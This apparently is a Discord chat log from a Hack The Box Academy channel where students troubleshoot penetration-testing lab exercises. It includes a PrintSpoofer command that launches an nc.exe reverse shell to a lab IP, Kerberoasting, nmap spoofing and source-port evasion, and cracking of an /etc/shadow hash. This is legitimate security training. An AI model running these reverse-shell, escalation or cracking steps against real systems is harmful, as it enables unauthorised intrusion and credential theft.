#modules

so you'd do
ssh root@ip -p port -i /path/to/file

it doesn't matter that you named/saved the file as plaintext.txt

i know

what part is breaking down for you then?

but its smarter to name them right , later you will have more then 1 ip

^ that too

why am i saving the key to my desktop?

so you can use it

to ssh as root...

@steel grail so you can ssh from your machine to the victim

and do chmod stuff etc

on the file

since you saved it on your machine, you have ownership perms over it

so you can chmod it to your heart's content

idk how many times we can repeat the same info to you

ssh root@94.237.55.163 -p 42029 -i /home/Desktop/plaintext.txt

/home/username/

or ~/Desktop/plaintext.txt

~ is aliased in linux for "/home/$USER"

<@&861185840277487616>

jfc antisemitic bullshit

10/10 news network called "bestnewshere" totally reliable and unbiased

wtf ?

asks me for root password.

let me try one more thing

did you copy everthing from the file ?

make sure the file has right perms

if it doesn't it will yell at you first about it then prompt for pw

root@94.237.53.58's password:

your file doesn't have the -----BEGIN OPENSSH PRIVATE KEY----- and -----END OPENSSH PRIVATE KEY-----

ohhh

it needs the hole thing?

as i asked 😉

yes

yes

that's part of the key to identify it

yes you actualy need that part, my first ime dealing with sshkey i did the same thing

we probably all did 🙂

nah but one of my issues was weirdly my copy/paste shifted some characters around one time

super odd. worked in one text editor but not another

very interesting

is there any other then vim ?

still asks for a password

chmod 600 ?

1 sec

wont even let me chmod

on your own machine ?

copy/paste your command directly as you have it in your command line

don't make any substitutions or anything

remember this excersize is against a public target and you DO need to specify the port

and after this do fundamentals 🙂

otherwise it's defaulting to 22

and learn how to crawl before running

i learned to bashcrawl before I ran

ssh root@94.237.53.58 -p 37748 /home/root/Desktop/plaintext.txt

nope

missed -i

Warning: Identity file /home/root/Desktop/plaintext.txt not accessible: No such file or directory.

yes

because the username is YOUR username

if you're using pwnbox it's like htbac-110102 or something like that

/home/root/ is not a dir

which is why i suggested doing ~/Desktop/plaintext.txt so you didn't have to type/autofill it out

yall my module doesnt mention anything of this

because this is an assumed fundamental knowledge

100% true

^^^

take notes is very useful lol

@steel grail which command to use to know who you are on a machine ?

Load key "/home/htb-ac-1139337/Desktop/plaintext.txt": bad permissions

ok now you know you need to chmod that file

it'll need to have permissions like rw-|r--|---

or rw-|---|---

and an example of that is already given in that section, just need to use the right path

^

I DID IT

😛

└──╼ [★]$ chmod 600 /home/htb-ac-1139337/Desktop/plaintext.txt

ssh root@94.237.53.58 -p 37748 -i /home/htb-ac-1139337/Desktop/plaintext.txt

gg

now it's as simple as using a cat

yup got it

i kinda get it now

which is that course i should take?

you should do linux fundamentals

ok

linux fundamentals

ill do that thanks yall

the information security fundamentals skill path is considered a pre-requisite if you're doing the CPTS path

the CPTS path is assuming fundamental and working knowledge of the linux and windows command lines/file structures

i.e. /home/user being analogous to C:\Users\user

or that linux is case sensitive while windows could not care less

So was saving the key, and then sshing to the ip at the key location basically bypassing the root password ?

the id_rsa file is a different authentication type

it's not so much bypassing password as it's just using a different method

like using a thumbprint or a passcode to unlock your phone

the thumbprint doesn't necessarily bypass the passcode; it's just an alternative method for authentication

did i miss anything , got disconnected

he is (g)root

nice 🙂 congrats

btw any CPTS in here ?

no

ok. im new. what should i do now

?? lol

First of all, it's a good idea to read #welcome and #rules

I'm guessing target spawning is still not working right now?

Been waiting 15 mins already

still? thought it's fixed

which server

refresh page and try again

Very cool

Not sure why this command "GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley "
isn't dispalying the TGS hash, even though it does so in the example.

The "KRB_AP_ERR_SKEW(Clock skew too great)" isn't something I could fix . The solutions for this error I looked at seemed to suggest that both client and KDC need to be synced.

that's correct, sync your clock against the dc, use ntpdate or rdate

that command feels off to me like you copied the second line but it could just be the formatting

what's up btw

yeah it looks like they are using the linux system that's on the internal network btw which is what's odd

Is there a way to change the server? I can load the pwnbox instance no problem if that's what you're referring to. The target on the other hand I don't see a way to select a server, and it won't load

I refreshed and logged in and out, frustrating

don't remember running into that tbh

eu2 works last I checked

what server are you on?

I tried US-Academy 1 & 2, just switched to EU2 and clicked on spawn. Hope it works

But I thought this selection was for the VPN server, not the target spawn. Unless they're one in the same

the target will spawn in the vpn server you selected

is it just me or targets are not spawning?

Not just you @regal sigil

is eu2 also not working?

It's been 5 mins already

Which servers have you tried @regal sigil ?

us1 is not spawning, just tired it

aren't only pwnboxes spawned in selected region, while targets are not?

rgr, informed our te am

Servers are bad right ?

everything is spawned in the selected regions

i see, thanks

I tried this command ||rdate -s FREIGHTLOGISTICS.LOCAL\sapsso|| and this command ||ntpdate -s FREIGHTLOGISTICS.LOCAL\sapsso||

Btw thanks Marcie u help me yesterday 🤙

oh. uhh I would tell you to reset but it looks like the servers are down. the clocks are supposed to be synced and the attack box doesn't have internet to install those packages

it really do be like that sometimes

So just way until the internal team fixes the issue

*just wait

you run it against the server ip btw, not the fqdn\user, but it doesn't matter since it doesn't have thos packages

unfortunately yes

you can try sudo apt install ntpdate but it probabyl won't work

@next bronze sorry for asking did not know what the icon was 😉

We are aware of problems regarding spawning/connecting to targets.

Our team is investigating this and we will provide updates/further information when it becomes known.

I was able to spawn a target finally, with US3

But I still having problems, with the vpn I do connect but I can’t reach the spawned target

tried pwnbox ?

Any tips?

Hi everyone. I'm doing the Intro to AD module and had to create a GPO using the following command

||```Copy-GPO -SourceName "Logon Banner" -TargetName "Security Analysts Control"``||`

But I just keep getting an access denied error

what section? try running as admin

Task 3 of the Guided Lab pt 1

Module 74/Section 708

yeah did you try running powershell as admin?

🤦‍♂️

Working now, thanks

ID10T error

hi guys can i reate private ctf for tomorrow?

create*^

dynamic analysis

SQLMap Essentials - Skill Assessment.

having an issue bypassing the security. any help would be appreciated

hey guys on the getting started module, in the privilege escalation section, how do you get to root?

is it through the /.ssh/authorized_keys thing?

hey y'all.. whats your way of documenting an exploit... what do you consider when choosing what to note

that's quite a vague question, note everything of note. check the documentation & reporting module

yes, check for a key that might get you in as root

if I remember right it's the tamper scripts

where do i check for that? the root folder only has the flag and idk where to look

search for hidden dirs

I know . I just don’t know which one to use and I’ve tried a lot.

After 3 hours I’m rage quitting to take a 30 mins break lol

Since that module is “almost” done

OOOOOOOOOO, got it

thank you so much, im still not used to doing that

just use ls -la as much as possible 😉

what's -T5 actually do

i find bug in rock stare

a leid

Try googling it

is it in nmap

man nmap

-T5 is very aggressive scan

solved, thanks.

thank you

@rustic sage No problem

Hello I'm working through nmap Firewall and IDS/IPS Evason lab. I'm trying to use nmap to scan with a different source IP address and it is not working. target machine IP is 10.129.65.32. Im using the syntax from the example giving

#cpts message

okay, thx!

I didnt mean paste it there

I mean the message it links to

ahh okay, I see. well I will try again tommorrow then. thanks for the heads up

np :)

which path are you doing?

why are you use -S on an ip that you can't reach? you don't get useful results back that way
https://nmap.org/book/man-bypass-firewalls-ids.html

cpts

doing it instead of oscp modules

more in depths tbh

was trying to spoof my ip address so it look like it is on the same subnet as the target according to the notes and possibly get a respone back from the port. It must be another method then to solve the challenge

the response will be sent to that spoofed ip, so you won't receive anything on your end

if it's hard diffculity, try specifying a source port

ahh, makes sense! Thank you!

agreed, people ask me all the time why I'm taken CPTS, it is extremely difficult lol. I like a challenge and when we complete this, everything else will seem like a breeze

Hi can anyone hack one Facebook account

no

im so lost.... im on the linux thing and its already so complicated

it's really not; though i will concede that the linux fundamental module can seem a bit out of order

I am ad enumeration module initial enumeration section
the task asks the commonname for the host 172.16.5.5
I run a nmap -A scan and get the name but the answer is not correct any tips?

Lol take a quick Linux course first on YouTube

its asking me to find the number of paths for the website

should i ssh into it?

you completed the exam?

no

that's the certificate authority's common name, not the host's common name, look elsewhere

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

yes; it's telling you to directly use curl

i see that

No but I have Redhat training so the course is not to hard to grasp. If I didn’t know Linux before then I probably wouldn’t start here

just gives me a bunch of html. im assume there is another tag ineed

you need to do a bit of trimming and stuff to find it exactly

i'd say try doing some of the other sections first bc after that it'll make sense

i understand that, im trying to go back to earlier sections and see

linuxfundamentals is just kinda jagged

@inner elbow please send me a DM whenever you have a moment , thank you 😉

I tried digging into the dns
dig all @172.16.5.5 inlanefreight.local
got 3 answers containing 1 ns
I then try
dig all @172.16.5.5 academy-ea-dc01.inlanefreight.local
and get srvfail

any particular redhat cert?

think what a hostname is... and you're so close lol

yea I tried academy-ea-dc01 that too did not work

why not try the whole thing

I tried academy-ea-dc01.inlanefreight and inlanefreight.local too the common name is not one of those

did you try adding .local to the end of the first one?

yea

got now

my case was wrong

:D

did it in lower and worked

thanks guys

Just Linux+ and Lpic Cert, my job paid for Redhat training but I ain’t take the exam yet RHCSA

I gave up and looked online. no clue where they got this from ps aux | grep proftpd

which section should i look at that would help me jog my memory for this? just seemed to kinda jump at me out of nowhere

Hii

? That has nothing to do with the curl part

sorry yes thats a different question

Probably regex, and stuff to do with outputs for the curl question

The red hat certs ever go on sale?

its just linux fundementals dont even think they have taught me regex yet

This is straying from the channel topic

My bad

Regex = regular expressions

https://regexr.com/
Use this always helps me

bruh....

it literally just exponentially gets hard as heck

Hi, I'm having a problem with the target not spawning on the "Footprinting - Oracle TNS" module. Already tried from different browsers, deleted cookies, and still not working. Any advices?

#cpts message

you don't need to know regex now, but for the other stuff in the module, take your time to understand it

thank you

being able to do research and help yourself learn is very important

i looked online and it said to look at filter contents for the curl question

correct, the filters that you need are already provided in the section, try to understand the examples and what they do

i may have gotten ahead of myself. maybe i skipped a module ill be back once i read throuhg everythingf

Nope everything you need for it is in linux Fundamentals

i mean in linux fundementals

within that course

i may have overlooked one of the modules

Sections*

😦

Linux Fundamentals is the module name

i know

im sad cause its hard

grep -Eo "https://.{0,3}.inlanefreight.com[^"']*" | sort -u | wc -l how the heck did they get this??? apparently that is the right soltution?

i need regex for it but the sext section was regex???? make it make sense

. Can be regex for any character .{0,3} means between 0 and 3 characters before the inlanefreight.com portion

There's plenty of online resources for regex

im just surprised a regex question was before the regex section on linux fundementals

grep -Po "https://www.inlanefreight.com/[^'\"]*" | sort -u | wc -l
was actually the answer

I'm doing the /module/74/section/700 . Can someone tell me where the answer is wrong? academy is always frustrating

What's the actual module name

Module number and section number just makes it more of a pain to look up

INTRODUCTION TO ACTIVE DIRECTORY

Active Directory Structure section

did you add a space or something by accident

Try capital A?

Also weird spaces happen

Sometimes refreshing the page works too

||authorization|| worked for me

thx i am idiot

Yooooo what’s goodie everybodyyyy. Hope yall doin well. I’m attempting to complete windows privesc module and I’m stuck on the miscellaneous section any tips would be much appreciated. Peace and love !

this was no easy task , but finally pwnd

🔥🔥🔥

tell us what is the problem you tried to solve 🙂

Now for its followup, attacking common services

It's a shame imo they don't give some basic enum commands for mssql in footprinting

yes and no , so oyu have to work out a bit for yourself

I mean the idea for the related skill lab is to just fuck around

And click on things

I’m trying to get VMware files from within the server but nothing seems to be coming up bruv looking for extensions like .vmdk ..vdh .vdhx etc

That’s what chat gpt is for now 😭😭

Don't rely on chatgpt

I'm simply stating it's missing some basic enumeration. That's covered in attacking common services

if you try this in real world you may have to wait a bit 😉

those files can be large

Dude I love when they make you try and methodology not mentioned within the notes but it’s just so time consuming

Again I'm not saying it's bad, it's just a minor flaw

¯_(ツ)_/¯

enum is the key

Otherwise it's pretty good for footprinting basics, but if you only have command line access then you're gonna be doing a lot of heavy research

¯_(ツ)_/¯

It’s honestly my favorite part of the process

mine is priv esc 😄

Have you checked out anything on senior web app pentester

Nope

Been busy with other stuff

I struggle with that I’m gonna work on it

i have the pleasure to work in the field , i struggle every day 🙂

Anyone else has problem starting new Targets? Tried with different browsers but it seems stuck for any module.

yes it was a bit "slow" today

mhm, atm its not even starting. Not sure if its me or there is a problem on htb site

it was a problem on htb thew whole day

ahh okay got ya

then I will just have to wait ;D

sometime refreshing helps

good night and hack the planet 😉

ethically

tf when you get root before the first flag

in the exam of the modules

lol

@maiden field did you import powerview?

yeah that was the problem

can anyone please help me with Example 2: XML in ADVANCED DESERIALIZATION ATTACKS. There is a section I don't understand

can i use fedora linux on the oscp exam ?

as my main driver

well this channel has nothing to do with OSCP

nor does this server

nice leak

HTB{*} is the format

OH of COURSE

I switched to US academy 3 and it started working for me again.

Can anyone help with an NCAT error? It am getting Connection refused message when running the command "sudo nc -nv -p 80 10.129.2.47 31337
" Am i doing this correct?

This is the messge "[★]$ sudo nc -nv -p 22 10.129.2.47 31337
Ncat: Version 7.93 ( https://nmap.org/ncat )
libnsock mksock_bind_addr(): Bind to 0.0.0.0:22 failed (IOD #1): Address already in use (98)
Ncat: Connection refused.
"

do you need to bind to port 80 for this connection?

oh if you're using the pwnbox; that's why

I would think so, Looks like port 80 is open

Yes that is correct.

pwnbox uses port 80 as it's connection to your browser

also port 22 is also in use; ssh is running on the pwnbox

Okay so im a bit confused, i am trying to complete this task "Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer." Based on previous lessons, I first needed to find open ports, then once i find the open ports, i would need to connect to that port via NCAT and then that should tell me the information i am looking for. Am i doing this correctly based on the information i provided?

you don't need to bind a port to connect to another system

you can just do nc -nv ip target_port

Thank you for everything i will attempt this, And see how it works. More so i am still trying to understand it a bit more. This is my first week in HTB 🙂 Thank you!

in some cases you may need to bind as port 53

but that's not always

So correct me if im wrong, My target port would be considered "80" /" 22"Considering its open correct?

"Identify the service our client was talking about" port 80 correlates to web and 22 is ssh

perhaps they're referring to a different service

what section is this in the network enumeration module?

Firewall and IDS/IPS Evasion - Hard Lab

read the section regarding dns proxying; Syn scan, source-port, all ports are gonna be the clues i give you

but other than that everything you need is in the module

Sounds good, Thank you!

Yeah the source port is very important

Okay guys i have gotten this far "HTTP/1.1 400 Bad Request
Date: Mon, 22 Jan 2024 06:01:16 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 127.0.1.1 Port 80</address>
</body></html>" I entered the answer 127.0.1.1 however answer was wrong..

start with nmap

Yes Nmap gave me 3 ports total.. 22 OPEN 80 OPEN and 53 FILTERED. So i tried 80 as a target and 53 as source port

did you: 1) reread the dns proxy section 2) adjust your scan accordingly

with --source-port, and -p-

i pointed you directly to the subsection of reading that would lead you to the answer after careful enumeration

I will say i read it and answered and used the information from there to the best of my knowledge

It seems i did not fully understand it properly, So let me try to read again.

wouldn’t he need -sV for service version

nmap doesn't always give correct info

and this excersize is to emphasize the manual part after a scan to confirm info as well

it only gives what the port speaks

"However, Nmap still gives us a way to specify DNS servers ourselves (--dns-server <ns>,<ns>). This method could be fundamental to us if we are in a demilitarized zone (DMZ). The company's DNS servers are usually more trusted than those from the Internet. So, for example, we could use them to interact with the hosts of the internal network. As another example, we can use TCP port 53 as a source port (--source-port) for our scans. If the administrator uses the firewall to control this port and does not filter IDS/IPS properly, our TCP packets will be trusted and passed through." This seems very important, I am just trying to wrap my head around it.

yes and i've done this excersize and know that you need to use netcat/nc

this goes back to my comment about source port

I know this might be the wrong bord to post this but what the heck im to curious im doing the Linuc Priv Esc from tcm security
but the instructor manage to get Hash-cat to crack the the password from /etc/shadow even thought the operating system added a randomly generated characters call salt into the final hash.
For example the password123 produce 2 =/= values when a salt is added in this case the salt is "Tb/euwmK" witch produces the hash in /etc/shadow $6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0

My hashcat was unable to crack the passwor123 even thought it was included in my rockyou.txt file
how did he make hash-cat take the salt into account?

the hash is prob wrong

Got it, Let me keep going for a second.

this

seems like you include a : at the end

just copy the whole line

i got the marcie-stamp

so i jsut did hascat -m 1800 -a 0 hash,txt and pass.txt but only containing the correct password witch is password123
but it doesn't work.

Marci thank you for being so patient with me, Hopefully i am making progress, Based on the information i sent earlier, It looks like the server name is "Ubuntu" here is the command i have entered "sudo nmap 10.129.2.47 -p- -dns-servers Ubuntu --stats-every=5s" However this is still giving the same 2 ports, 80/22. It seems i could be doing this wrong.

nope

"source-ports"

anyone having issues with spawning machines?

this is taking forevah

1800 isn't bcrypt?

im cracking for sha512crypt $6$, SHA512 (Unix) 2

Oh my god... Something so simple...

are you setting the hash and wordlist in the correct place?

hashcat -m 1800 hashfile.txt /usr/share/wordlists/rockyou.txt example

that too

This is my command i cp the rockyou file in my current dir so no need for /usr/share/wordlist...

you dont really need -a

at least i dont really use it. I often test with john as well if it doesnt seem to work

so you could do that or debug it

Is this related to a module at all?

If not, please keep the channel on topic

Thank you for your help Marcie, SO i want to make sure i understand what i did, So we basically used the TCP/UDP port 53 as our "Source-port" to scan the target to find other ports besides 80/22, then used the the 50000 port to be able to connect with NCAT to port 80?

why would you change a working sourceport?

-p just specifies your host system's port

so nc -nv -p [host_port] [target_ip] [target_port]

you found the target port

just use the same source-port for host_port

Well i have the flag now lol, I am just trying to understand what i did

Feels like i just did a bunch of stuff without fully grasping what i just did.

you aren't using the found port to connect to a port

you are using a port to connect to the found port

I see okay. Thats a good way to put that.

normally when you connect to an IP you are connecting with a random port

with the -p option with nc/ncat you are specifying that you are binding to that port on YOUR system

i hope so lol

you are using that port to communicate with

the linux privesc module allegedly

anyway; your filepath looks like you're doing a THM room; not an HTB learning module

I see now, Now i am following you now. That makes sense, Thank you for your patience and information!

i cannot start a single machine. stuck at "Target is spawning..."

the reason for sudo is bc i believe the first like 1200 ports or so are "reserved" so you need root permission to unlock them to bind to

ill guess i have to wait and see later

if you tried without sudo it'd tell you like insufficent permission or something

Thats exactly what i kept getting.

In the Web attacks module http tampering attack when u do the CI thing, I tried all the nine http methods but they are all blocked

This is honestly mind-blowing in a good way, Got a good rush of dopamine, I have Been studying cybersecurity for the Sec + exam and just joined HTB last week to get hands-on practice, But this is some good stuff man. Once again THANK YOU!

Sec+ is just a bunch of theory

the exam is a bunch of mult choice ¯_(ツ)_/¯

That is true, I am actually starting SEC+ then NET+ so kinda doing things backwards, I took sec the 1st time and failed due to some networking questions I did not fully understand, so this helps quite a bit!

Some work but the command is not injected

Im not at my computer but where u stuck at exactly? Use the OPTIONS verb to see what the backend allows for this endpoint

Are u at assessment?

No
Bypass security filters

Options doesn't show anything which is weird

why do you have a space in the headers?

don't mind it accidently hit the spacebar before screenshotting

well if the request is packed properly i would suggest stripping down the headers and see if anything else happends

still,nothing

tried curl,same result

i am more pissed of options not working than the command injection not working

fix the box

can not spawn target T,.T what happen

my issue?

you can PM me

who can help me http/tls attack skill assessment:https://academy.hackthebox.com/module/184/section/1955, when I use padbuster it is no have result

I'm in the same place, were you able to get past this?

Yup, you can DM me.

Hello, I have a question about the boxes available. I've been waiting for 15 minutes for my box to spawn so I can move on. Do you know why it's taking so long? Is it a problem?

Maybe try curl -I with -X OPTIONS

Yes they are working on it

Weird, is index.php the page where you need to upload the files to?

yes it is

Hint - keep it simple

tried without it and also same result

literally tried EVERYTHING

Take a break for a few minutes, and in the meantime do something else, when you come back you will see that it was actually simple than you initially thought

this is my forth break, do i have to accept the fact that i am dumb now?

nope

then what

Anyone else having issues spawning target systems? Can't seem to make the system for XSS/Phishing spawn. Tried logging in and out as well.

The API call to start the system seems to return {"success":0,"message":"No active VMs."}. Spawning systems works for other modules.

I literally require sanity check at this point

It's the system for https://academy.hackthebox.com/module/103/section/984 in my case.

The web client keeps hammering the api for a system every 5 seconds. The result seems to be the same every time {"success":0,"message":"No active VMs."}.

Same here. I'm in a Windows module and it doesn't spawn. I tried to refresh and empty cache a few time, it worked once. VPN connection is ok though

check pinned messages

thanks!

Use burpsuite instead, theres a verb that works.
I recall OPTIONS not working too, probably disabled.

used it,used every verb

Your query should also include one of the other SMB operations already present in the example

Thank you

What if the box is buggy and needs a restart

Yeah have issues for few days to spaen

Hello, thanks for the reply, where did you find their communication that they were working on it? Thanks in advance

pinned messages

https://tenor.com/view/fire-gif-10341555270454130792

#modules message

@next bronze @buoyant escarp Thanks for that.. To be stuck at 95% of the Pen.Test path and to not be able to finish.. I'm going to cry T-T

Hope u have taken some notes

Ofc, but now I have to answer to questions of each chapter to finaly end and access to CPTS..

Hello everyone, has anyone completed the skill assessment in the modul Modern Web Exploitation Techniques? I needed 1 - 2 tips on how to get the passwords for the users admin and htb-stdnt.

Hi, i've got stucked at YARA & SIGMA FOR SOC ANALYSTS , part: Skills Assessment:
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r
I have used HxD to see strings and hex values which could be valuable, but eventually it didnt help me, so did the uncompleted yara rule seatbelt.yar
Could someone help me with it?

I am trying to complete the path in 43 days, now stuck at 37% as I can't spawn any targets .

wanting to push the path through on the basis of time is, in my view, the wrong approach. It is much more important to understand everything properly.

I partially agree with this. It really depends on the person's learning style. For me it's like completing the path, hop onto boxes, get stuck, revisit the material + supplement with other sources. Like learning by failing at each point. I remember much more when I fail.

Dude I’ve been taking this course for a year now if you do it within three months your a goat

I’ve been trying to understand and I do comprehend but I have the worst memory and test anxiety

Also for lazy people like me setting clear goals help.

I'm not saying it can't be done. But you'd rather need more time and have understood everything correctly than stick to the given time frame and then realize at the exam that you still have a lot of gaps

Don't worry, if you don't pass an exam, it doesn't mean that you were bad. It just means that your performance was not yet at the desired level

I get this, I plan to only complete the path in the given time frame. But not take the exam immediately. Btw do we have a list of machine we should attempt apart from of TJNull list and Dante Pro lab ?

doing boxes won't be a noticeable help for the exam

Most modules end with a list of boxes that you can do.

But whether they are helpful is another matter

I didn't understand this could you explain ?

I can’t think of an occasion where I used what I have learned doing a box in the exam. Most of the boxes are out of scope, the exam does not test your ability to carry out some crazy exploit. There are also many things in the exam you don’t encounter when doing boxes, such as it being a networked environment, and post exploit information gathering.

You just made me more self conscious

Isn’t the exam similar to the modules tho ? Asking anyone who took cpts

there's nothing to be self concious about, you don't have to pass on the first try, and not everyone does

#cpts message

No, the modules each deal with one topic. The exam requires knowledge from all modules.

@ocean flume it's fine even if we don't pass on the first try, I guess that why I like the HTBs approach , you get a retake , even if you fail you learn.

Thanks.

You know what you right bro. Issa learning experience. Failures can be apart of it.

what abt preparing using prolabs ?

I just wanna get to that point where I don’t have to consult a write up anymore

also talked about it in my blog, it can helpful but not necessary, you'll need to be mindful of what's in scope

I was thinking about that but I think there’s a couple of insane and hard boxes that give real world feel.

those aren't "real world"

yeah , ppl just want to feel comfortable before the exam

You know what I meant boss

the only way to get the real word experience is to land a job , but you need experience to do that

Screw it bro imma just go head first and take the exam as soon as I finish this path

||PS C:\Users\Public> whoami /priv

PRIVILEGES INFORMATION

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\Public> ./PrintSpoofer.exe -c "c:\users\public\nc.exe 10.10.15.65 5555 -e cmd"
||

windows skills assessment part 1, im not getting revshell

glhf

I am not sure if this was the right approach, but in Footprint I had a hard time understanding SMB , I searched for every topic related to SMB, it led me to the AD module and attacking common services. I got better understanding of the services, than just by reading the footprinting module and the point where I was stuck got resolved immediately.

I'm just saying that the boxes aren't very realistic, they have real vlns yes, but not realistic in terms on stucture

Dude I mass applied on LinkedIn the other day found some really good positions but they’re not gonna call me 😢

footprinting is meant to just be a brief overview of the topic

it's not meant to be much; it's just saying "Hey here's some signs you're looking at x service"

you will get ur chance don't worry

Attacking Common Services goes deeper into the topics

Overall great course material is a lot to read but the way it’s written is very engaging

Thanks bro I need some positivity

You guys are 🔥. Thanks guys, for responding.

I think I am starting to get a feel of this why you are saying the boxes aren't realistic. Correct me I am wrong, in beginning of AD module the scenario the author mentioned was more from mis configuration and lose security controls pov rather some big vulnerability in the structure. I think that's the type of thing you are trying to imply?

it is still possible to have those kind of vulnerabilities, but misconfigurations are way more common

more realistic means the vulnerabilities/path isn't immediately obvious like the boxes, you will need to dig around and have a sharp eye. in the real world you won't run into a target where only a few services are running

Some modules are written from the author's prior real-world experiences

obviously adapted/modified to fit the module

I hope the issue gets resolved soon 😕.

this is entirely the case btw; a lot of hacks come from some misconfiguration that gets taken advantage of or some misplaced set of creds

also if you're planning to do the CPTS exam, you should do them in order, if not then doing modules as you want to is fine

Ah 💡 that's why there is more focus on targeted password spraying in the modules

Hey guys, sorry to interupt the conversation. Quick question regarding enumeration module. Why do you think nc can get the banner of the service when the nmap can't in this example? I already got the flag but im just curious why I can get it via nmap. Hope I'm not revealing too much information in the ss

that's a completely subjective question tbh; also not really related to academy modules (aside from the 'suggested boxes' after you complete a module)

is discord also shitting the bed now? images aren't loading

nmap doesn't grab all the information sometimes; if a service is slow to respond or doesn't broadcast it's info all the time then nmap doesn't know what it is; also the version scan only really checks if the service is a standard service name

training? not really; practice, yes

https://tenor.com/view/epic-embed-fail-ryan-gosling-cereal-embed-failure-laugh-at-this-user-gif-20627924

it's likely compression due to the size

you need to link your htb account to the discord following #welcome

training would be learning new skills; practice would be applying skills

For me practice is like reusing the concepts I learned in the training

you can train AND practice at the same time

academy provides training, labs provide practice (i think)

Training is on HTB academy - any of the tier 0 modules are free. And HTB labs are good for practice, any active content is free

For example you are trained in nmap in enumeration module , but as you use nmap in others modules you get more familiar with nmap that's practice

hi good ppl, a quick question, is anyone's academy module/page being very unstable right now?

i mean if you wanna read a bunch of stuff

I can't comment on that , but academy modules was a good training method.

if you don't zone out reading manuals, sure. training would also provide why to use certain tools

HTB Academy focuses on applied training

as in; it gives you a scenario, examples, and syntax then provides a contained lab for you to apply that newfound knowledge

it doesn't just throw the whole boat at you

it can be; if that's more your speed

but that's all up to the individual user ¯_(ツ)_/¯

then jumping into HTB labs is fine if you wanna just fuck around and find out on live machines

VIP gives you access to retired machines, which have writeups available

yep; and there's tons of retired content out there

it would be very hard to get started on labs without some basic knowledge

up to you

if you don't care about retired content/reading writeups for machines to learn from then it's not worth it for training/learning

the Starting-Point boxes on HTB Labs can give you a bit of a foundation

go do a starting point box, if you can finish it without looking at the walkthrough then you can carry on

if you're running a machine using the vpn, then there is no time limit

even for a free user

the time limit is solely for the pwnbox (in-browser vm)

that's a personal question LOL i can't tell you one way or the other how to spend your money

we're also wandering off-topic from this channel

if you wanna chat more about this you can ask in #general after following instructions in #welcome

Quick question are we allowed to use pwnbox during CPTS ? ( I cant run hashcat on my setup memory issues 😭)

yes

What would you say would be a good rule of thumb for these kind of services? When the port is not open/closed and looks strange just double check it with nc or some other tool?

it would be stupid if not

but if your setup could run a vm then it can run hashcat, run it in your host

it depends, i'd check other open services first before going onto filtered ones

Just purely htb rn

services in this case being what's being broadcast on a port

which is universal not just for htb

With htb unlikely as you connect to their vpn

miniscule

but if you can connect to the website/ip then it's not filtered

that's not really how it works, if something is geolocked they'll do more than just asking what country the request is from

I have been working on the task "https://academy.hackthebox.com/module/113/section/2139" Attacking Common Applications Attacking Thick Client Applications for 3 days, the Windows VM is so slow that you can hardly work with it. I have started a new one after a few hours, this did not help either, I have also changed my VPN etc also no improvement, I also have the same problem via the Pwnbox machine.
So I can't manage the task, is there any support from HTB?
I'm really exhausted, I've been sitting at it for about 15 hours and can't get any further!!! 😭

@fair basin I can help you in dm's I did it 2 days ago and was also having problems

Is that ok?

yes plz

Hello, is there any information with access to the target machines?
I have been unable to connect to the last task in the module for half a day - "Introduction to Windows Command Line"
Maybe there were some problems on the server, there were announcements?
Or is it just me?

They are working on that issue.

change vpn region, see if that fixes it

Is there a separate chat with announcements or problems?
For information to monitor?

no; most you can do is chat support on the website to raise the issue

in-general backend support isn't on the discord

sometimes in #1024429874246590575 they'll pin a staff message related to issues

We’re aware of it

Changing the region is already when you know what to connect to, but the VPN does not work.
It's different here, I don't get the address of the box itself)))

^

it still works as the target is spawned according to the vpn region

some regions seem to be fairing better than others

having an issue starting machines in the Cross-Site Scrpting (XSS) module. is it an issue with the module itself or is the issue on my end ? i have not had such issues before .

Ah, now it's clear, this is a common problem.
That's why I clarified it, thank you.
Then we are waiting.

read pinned

sure

it seems to be an intermittent issue

okay thanks

After changing the VPN region to EU Academy 2, the VM no longer comes up.
Where can I get a status page if VM or VPN of Academy HTB have problems etc...?

Hello,
I'm having issues with the lab environment for the pivoting modules.
Every time, I try to start the target, it gets stuck on tarhet is spawning
I tried with 2 browsers

@fair basin I don't know if there is any status pages. But they are aware of the current problems and hopefully we will get some kind announcement when its fixed

@storm hedge Check pinned messages

it's an issue that started Saturday

II already had these problems on Friday,

then i am just unlucky

I already have administrator permissions, but it says I have a flag error, is it because of the network?

whats your issue again and where is it ?

P@snow ridge thank you

for the ones who have issues with the target machines, change your vpn to EU 1 . seems to be working for me

I was on Eu 1 before that, in EU 2, the Windows VMs do not start at all

the labs down again or what ?

I was waiting for hydra to finish for more than 30 min , then I notice the lab is already down

i have switched to us 3, it looks like everything is running

https://status.hackthebox.com/ the status page shows that the labs are working???

Hello guys,I am doing the Bleichenbacher Attack from Attacking HTTPS/TLS accademy module and I am stuck at the first lab. Seems like the Bleichenbacher.jar can't parse local pcap without bypass the check connection(at least the -skipConnectionCheck**) is not working. Anyone who had same issue?
PS: I managed to find the supplementaty flag but not the mandadory one
